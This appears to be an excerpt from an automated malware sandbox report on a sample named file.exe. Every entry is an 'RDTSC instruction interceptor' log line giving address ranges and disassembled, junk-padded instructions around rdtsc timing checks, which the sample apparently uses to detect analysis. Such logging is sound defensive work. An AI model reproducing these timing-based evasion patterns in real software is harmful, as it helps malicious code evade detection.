                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A2DB second address: 48A2FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5E60CAC68Fh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F5E60CAC688h 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A2FB second address: 48A316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E60BA1667h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A656 second address: 48A66D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E60CAC688h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5E60CAC688h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A66D second address: 48A685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jp 00007F5E60BA1656h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop ebx 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A75B second address: 48A7BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d jns 00007F5E60CAC688h 0x00000013 popad 0x00000014 nop 0x00000015 mov edx, dword ptr [ebp+122D3A1Fh] 0x0000001b lea eax, dword ptr [ebp+1248E0E4h] 0x00000021 push 00000000h 0x00000023 push ecx 0x00000024 call 00007F5E60CAC688h 0x00000029 pop ecx 0x0000002a mov dword ptr [esp+04h], ecx 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ecx 0x00000037 push ecx 0x00000038 ret 0x00000039 pop ecx 0x0000003a ret 0x0000003b movzx ecx, ax 0x0000003e nop 0x0000003f pushad 0x00000040 jmp 00007F5E60CAC696h 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A7BE second address: 48A7DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5E60BA1665h 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A7DD second address: 465E9D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F5E60CAC688h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 movsx edx, bx 0x00000029 mov cl, bl 0x0000002b call dword ptr [ebp+1245A0BFh] 0x00000031 jg 00007F5E60CAC69Bh 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F5E60CAC68Eh 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD4D6 second address: 4CD4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD4E0 second address: 4CD4FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC697h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD68D second address: 4CD691 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD829 second address: 4CD833 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD833 second address: 4CD844 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnc 00007F5E60BA1656h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD844 second address: 4CD861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F5E60CAC686h 0x00000011 jbe 00007F5E60CAC686h 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD9AA second address: 4CD9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CD9B0 second address: 4CD9B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDB61 second address: 4CDB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CDB67 second address: 4CDBD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5E60CAC692h 0x0000000b jmp 00007F5E60CAC68Ch 0x00000010 jmp 00007F5E60CAC696h 0x00000015 popad 0x00000016 push esi 0x00000017 jmp 00007F5E60CAC692h 0x0000001c pop esi 0x0000001d popad 0x0000001e jc 00007F5E60CAC6ACh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 jmp 00007F5E60CAC698h 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D02D7 second address: 4D02DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D02DF second address: 4D02E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFE9E second address: 4CFEA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFEA4 second address: 4CFEA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CFEA8 second address: 4CFEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D414D second address: 4D4156 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB600 second address: 4DB610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Ch 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB610 second address: 4DB614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB614 second address: 4DB624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E60BA1656h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB624 second address: 4DB631 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA671 second address: 4DA675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA675 second address: 4DA68D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E60CAC686h 0x00000008 jo 00007F5E60CAC686h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jnc 00007F5E60CAC688h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48A1A3 second address: 48A1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE70D second address: 4DE724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F5E60CAC686h 0x0000000e push edx 0x0000000f pop edx 0x00000010 jp 00007F5E60CAC686h 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DE724 second address: 4DE72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DEE68 second address: 4DEE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC68Ah 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E192F second address: 4E1935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1935 second address: 4E1953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F5E60CAC686h 0x0000000c jmp 00007F5E60CAC691h 0x00000011 popad 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1953 second address: 4E195D instructions: 0x00000000 rdtsc 0x00000002 js 00007F5E60BA1666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F47 second address: 4E1F52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F52 second address: 4E1F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F58 second address: 4E1F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1F5C second address: 4E1F66 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5E60BA1656h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9F73 second address: 4E9F96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E60CAC686h 0x0000000a pop ebx 0x0000000b jng 00007F5E60CAC690h 0x00000011 jmp 00007F5E60CAC68Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 jg 00007F5E60CAC686h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9F96 second address: 4E9FBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60BA1661h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9FBC second address: 4E9FCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC68Ah 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9FCB second address: 4E9FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E7D46 second address: 4E7D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60CAC694h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8077 second address: 4E807D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E89B7 second address: 4E89BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8D04 second address: 4E8D14 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E60BA1656h 0x00000008 jnc 00007F5E60BA1656h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FDB second address: 4E8FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5E60CAC686h 0x0000000a pop esi 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FE6 second address: 4E8FFA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5E60BA165Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop ebx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FFA second address: 4E9001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9001 second address: 4E9018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E60BA165Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9018 second address: 4E901C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9619 second address: 4E9657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E60BA1656h 0x0000000a pop ebx 0x0000000b push esi 0x0000000c jnc 00007F5E60BA1656h 0x00000012 jmp 00007F5E60BA1660h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E60BA1667h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9657 second address: 4E965B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E965B second address: 4E9678 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5E60BA1656h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E60BA1661h 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9922 second address: 4E9926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9926 second address: 4E993F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60BA165Fh 0x00000007 ja 00007F5E60BA1656h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E993F second address: 4E9969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E60CAC693h 0x00000007 pushad 0x00000008 jmp 00007F5E60CAC690h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9969 second address: 4E996F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E996F second address: 4E997F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jg 00007F5E60CAC6A3h 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE705 second address: 4EE722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5E60BA1656h 0x0000000a pop ecx 0x0000000b jo 00007F5E60BA1662h 0x00000011 jp 00007F5E60BA1656h 0x00000017 jl 00007F5E60BA1656h 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2390 second address: 4F2394 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2394 second address: 4F239D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F239D second address: 4F23A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1456 second address: 4F145B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F145B second address: 4F146E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E60CAC68Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F146E second address: 4F1474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1474 second address: 4F14BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5E60CAC698h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F5E60CAC698h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F5E60CAC68Eh 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F14BE second address: 4F14C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1611 second address: 4F1617 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F17EC second address: 4F17F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F17F0 second address: 4F1823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F5E60CAC686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F5E60CAC696h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5E60CAC68Fh 0x00000019 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1823 second address: 4F1829 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1AB3 second address: 4F1AB8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1C5B second address: 4F1C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1C5F second address: 4F1C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5E60CAC686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jp 00007F5E60CAC68Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1C73 second address: 4F1CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5E60BA1667h 0x0000000a jmp 00007F5E60BA165Fh 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F9A43 second address: 4F9A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7C99 second address: 4F7CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E60BA165Fh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F7CAC second address: 4F7CB9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E60CAC686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F80A2 second address: 4F80A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F80A6 second address: 4F80AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8217 second address: 4F821B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F838B second address: 4F838F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F84E0 second address: 4F84ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F84ED second address: 4F84F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8658 second address: 4F865E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F865E second address: 4F8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8664 second address: 4F8668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F8668 second address: 4F86A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5E60CAC686h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jno 00007F5E60CAC692h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 pushad 0x00000016 jnc 00007F5E60CAC686h 0x0000001c push esi 0x0000001d pop esi 0x0000001e jno 00007F5E60CAC686h 0x00000024 js 00007F5E60CAC686h 0x0000002a popad 0x0000002b js 00007F5E60CAC692h 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F87DA second address: 4F87E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F87E3 second address: 4F87E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F87E9 second address: 4F87EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5034C2 second address: 5034D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E60CAC68Ah 0x0000000a pushad 0x0000000b popad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jne 00007F5E60CAC686h 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5034D8 second address: 5034DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
